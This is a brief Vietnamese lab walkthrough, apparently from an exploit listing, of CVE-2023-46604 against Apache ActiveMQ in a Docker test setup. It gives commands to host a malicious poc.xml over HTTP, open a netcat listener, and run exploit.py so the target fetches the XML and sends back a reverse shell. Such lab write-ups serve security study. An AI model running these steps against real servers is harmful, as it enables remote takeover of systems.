## https://sploitus.com/exploit?id=77E6233D-7556-5243-8E36-6A14BB7251B5
CVE-2023-46604
![image](https://github.com/user-attachments/assets/03899091-1319-4d60-a561-30293999c19f)
Dựng docker-compose chứa 2 image gồm máy nạn nhân và máy mục tiêu theo môi trường yêu cầu
Trên máy nạn nhân, tiến hành khởi động ActiveMQ
Chuyển sang máy tấn công:
• Mở dịch vụ HTTP để tiến hành gửi poc:
python3 -m http.server <port>
• Sử dụng netcat để lẳng nghe kết nối đến máy tấn công
nc -nlvp 4444
• Gửi payload tạo kết nối reverse shell tới máy tấn công
python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml
Trong đó:
- Exploit.py: file code khai thác lỗ hổng
- -I 172.18.0.3: Địa chỉ IP của máy gửi payload
- -p 61616: Cổng mà ActiveMQ của máy nạn nhân đang lắng nghe
- --xml http://172.18.0.2:8000/poc.xml: Địa chỉ url của tệp poc.xml trên máy tấn công
Có thể thấy, sau khi gọi lệnh thực thi file ‘exploit.py’, mã khai thác sẽ gửi một gói tin ‘poc.xml’ trên web server tới mục tiêu là địa chỉ của dịch vụ ActiveMQ đang chạy trên server mục tiêu. Đồng thời webserver HTTP trên máy tấn công cũng nhận được request được gửi từ địa chỉ ip của máy mục tiêu.
Sau khi tiến hành gửi payload, chuyển sang terminal đang lắng nghe tại cổng 4444 của máy tấn công. Ta thấy reverse shell của máy nạn nhân đã được gửi về.